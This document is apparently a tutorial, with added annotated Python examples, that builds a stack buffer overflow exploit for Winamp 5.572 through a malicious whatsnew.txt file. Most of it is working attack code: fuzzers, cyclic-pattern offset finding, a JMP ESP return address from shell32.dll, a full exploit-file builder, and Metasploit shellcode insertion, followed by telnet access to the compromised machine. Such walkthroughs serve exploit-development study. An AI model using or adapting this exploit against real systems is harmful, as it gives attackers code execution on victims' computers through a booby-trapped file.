#!/usr/bin/python
# Fuzzer 1: a .swf made of 600000 'A' bytes, to be loaded in Winamp
nama = "winampFLV.swf"           # output file name
coba = b"\x41" * 600000          # 600000 x 'A'
with open(nama, "wb") as f:      # binary mode so no byte is translated
    f.write(coba)
print("testing...")
Load the generated file into Winamp.
Then run Winamp under OllyDbg and load it again.
The application crashed, but when I ran it again under OllyDbg EIP was not overwritten.
So I tried to make it crash through a skin instead,
with a fuzzer for the file mcvcore.maki:
#!/usr/bin/python
# Fuzzer 2: a skin script (mcvcore.maki) made of 600000 'A' bytes
nama = "mcvcore.maki"            # output file name
coba = b"\x41" * 600000          # 600000 x 'A'
with open(nama, "wb") as f:
    f.write(coba)
print("testing...")
Copy the file into C:\Program Files\Winamp\Skins\coba\scripts
and switch to that skin.
The application crashed,
but when I tried it under OllyDbg, the application would not crash.
Then I tried fuzzers for config.xml and skin.xml, but they did not work.
I also tried whatsnew.txt:
#!/usr/bin/python
# Fuzzer 3: whatsnew.txt made of 60000 'A' bytes
nama = "whatsnew.txt"            # output file name
coba = b"\x41" * 60000           # 60000 x 'A'
with open(nama, "wb") as f:
    f.write(coba)
print("testing...")
But it did not work either.
So I added the Winamp version header to the start of the fuzzer output, like this:
#!/usr/bin/python
# Fuzzer 4: whatsnew.txt starting with the version line the parser expects,
# followed by 1000 'A' bytes
nama = "whatsnew.txt"
coba = b"Winamp 5.572" + b"\x41" * 1000
with open(nama, "wb") as f:
    f.write(coba)
print("testing...")
Now the application crashes and EIP is overwritten with 0x41414141, the "\x41" bytes.
Next, generate a 1000-byte cyclic pattern (Metasploit's pattern_create) and put it into the fuzzer in place of the "A"s:
#!/usr/bin/python
# Fuzzer 5: version header followed by a 1000-byte cyclic pattern, so the
# 4 bytes that land in EIP identify their offset in the buffer
nama = "whatsnew.txt"
coba = b"Winamp 5.572" + b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
with open(nama, "wb") as f:
    f.write(coba)
print("testing...")
Then run pattern_offset on the value in EIP to find which bytes of the pattern overwrote it. The answer is 540 bytes past the version header. To confirm it, put 540 NOPs and a marker at that position; EIP should read AABBCCDD (the marker bytes are written little-endian):
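To show what the two pattern tools are doing, here is an added Python example, not from the original post, that generates the same Aa0Aa1... cyclic pattern as Metasploit's pattern_create and maps an EIP value back to its offset the way pattern_offset does. The EIP value used below is the one the 1000-byte pattern would produce at offset 540; it is computed here, not taken from the post.

```python
import itertools
import string
import struct


def pattern_create(length):
    """Build a Metasploit-style cyclic pattern (Aa0Aa1Aa2...Zz9) of `length` bytes.

    Every 4-byte window in the pattern is unique, so the 4 bytes that land in
    EIP identify exactly one offset in the buffer.
    """
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern repeats after 20280 bytes; use a longer scheme")
    out = bytearray()
    for upper, lower, digit in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        out += (upper + lower + digit).encode("ascii")
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern, eip):
    """Return the offset of the 4 bytes that ended up in EIP, or -1 if not found.

    `eip` is the value as OllyDbg shows it (e.g. 0x41307341); on x86 it was
    popped from the stack little-endian, so the bytes in the file are reversed.
    """
    needle = struct.pack("<I", eip)
    return pattern.find(needle)


def whatsnew_with_pattern(length=1000, header=b"Winamp 5.572"):
    """Version line the parser expects, followed by the cyclic pattern."""
    return header + pattern_create(length)


if __name__ == "__main__":
    data = whatsnew_with_pattern()
    with open("whatsnew.txt", "wb") as f:
        f.write(data)
    # Value that would sit in EIP if the 4 pattern bytes at offset 540 were popped into it
    pat = pattern_create(1000)
    eip = struct.unpack("<I", pat[540:544])[0]
    print("EIP 0x%08x -> offset %d" % (eip, pattern_offset(pat, eip)))
```

The offset returned is relative to the start of the pattern, i.e. it does not include the 12-byte version header; that is why the next fuzzer writes the header, then 540 bytes of padding, then the marker.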
#!/usr/bin/python
# Fuzzer 6: confirm the offset. 540 bytes of padding, then a 4-byte marker
# that should show up in EIP as AABBCCDD, then filler up to 1000 bytes.
nama = "whatsnew.txt"
coba = b"Winamp 5.572"
coba += b"\x90" * 540                 # padding up to the saved return address
coba += b"\xDD\xCC\xBB\xAA"           # marker, little-endian for 0xAABBCCDD
coba += b"\x90" * (1000 - len(coba))  # keep the file at 1000 bytes
with open(nama, "wb") as f:
    f.write(coba)
print("testing...")
Now search for a stepping stone.
In OllyDbg: View --> Executable modules, double-click shell32.dll, then right-click --> Search for --> Command and type JMP ESP.
That gives the address of a JMP ESP instruction.
Don't forget to set a breakpoint on the JMP ESP address, to make sure EIP really lands on it.
Then edit the fuzzer to use the JMP ESP address, written little-endian:
#!/usr/bin/python
# Fuzzer 7: overwrite the return address with the JMP ESP found in shell32.dll
nama = "whatsnew.txt"
coba = b"Winamp 5.572"
coba += b"\x90" * 540                 # padding up to the saved return address
coba += b"\xD7\x30\x9D\x7C"           # JMP ESP at 0x7C9D30D7, little-endian
coba += b"\x90" * (1000 - len(coba))  # NOPs where ESP points after the jump
with open(nama, "wb") as f:
    f.write(coba)
print("testing...")
Now OllyDbg stops the Winamp process at the breakpoint when the JMP ESP address is reached.
Now make the payload.
Open a terminal and type:
root@bt:/pentest/exploits/framework2# ./msfweb
Then open the browser to generate the payload.
Copy the payload into the fuzzer right after the JMP ESP address, which is where ESP points once the overwritten return address has been popped.
Load the file: the application crashes as before, but this time the payload runs.
Then try to access the system using telnet.
Alhamdulillah ... :D
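The final file assembled in one place, as an added Python example that is not the post's own script: the version header, 540 bytes of padding, the JMP ESP address packed little-endian, a few NOPs, then the payload where ESP points after the jump. The msfweb-generated shellcode is not reproduced here; the placeholder used in the example is a constructed run of \xCC (INT3) bytes, which is a convenient way to confirm in OllyDbg that execution really reaches the payload before a real one is dropped in. The bad-byte list is an assumption about what a text-file reader is likely to truncate or rewrite, not something the post verified.

```python
import struct

HEADER = b"Winamp 5.572"      # version line whatsnew.txt must start with (from the post)
OFFSET = 540                  # padding bytes before the saved return address (from the post)
JMP_ESP = 0x7C9D30D7          # JMP ESP in shell32.dll on the post's machine (\xD7\x30\x9D\x7C)
FILE_LEN = 1000               # total file size the post's fuzzers used
NOP_PAD = 8                   # a few NOPs after the address in case ESP is slightly off
BAD_CHARS = b"\x00\x0a\x0d"   # assumption: bytes a text-file parser is likely to mangle


def build_whatsnew(shellcode, jmp_esp=JMP_ESP, offset=OFFSET, file_len=FILE_LEN):
    """Return the bytes of the exploit whatsnew.txt.

    Layout: HEADER | NOP*offset | JMP ESP (little-endian) | NOP*NOP_PAD | shellcode | NOP filler
    After the overwritten return address is popped, ESP points just past it,
    so JMP ESP lands in the NOP pad and slides into the shellcode.
    """
    bad = sorted({b for b in shellcode if b in BAD_CHARS})
    if bad:
        raise ValueError("shellcode contains bad bytes: %r" % bad)
    buf = HEADER + b"\x90" * offset + struct.pack("<I", jmp_esp)
    buf += b"\x90" * NOP_PAD + shellcode
    if len(buf) > file_len:
        raise ValueError("payload too large: %d > %d bytes" % (len(buf), file_len))
    return buf + b"\x90" * (file_len - len(buf))


def check_layout(buf):
    """Read back what lands where, to sanity check the file before loading it."""
    ret_at = len(HEADER) + OFFSET
    return {
        "ret_offset": ret_at,
        "ret_value": struct.unpack("<I", buf[ret_at:ret_at + 4])[0],
        "payload_offset": ret_at + 4 + NOP_PAD,
        "size": len(buf),
    }


if __name__ == "__main__":
    # Constructed placeholder: 8 INT3 breakpoints. Replace with the msfweb payload.
    placeholder = b"\xcc" * 8
    data = build_whatsnew(placeholder)
    with open("whatsnew.txt", "wb") as f:
        f.write(data)
    print(check_layout(data))
```

With the placeholder in place, OllyDbg should break on the first INT3 right after the JMP ESP; if it does not, the offset or the bad-byte list is wrong and no real shellcode will work either.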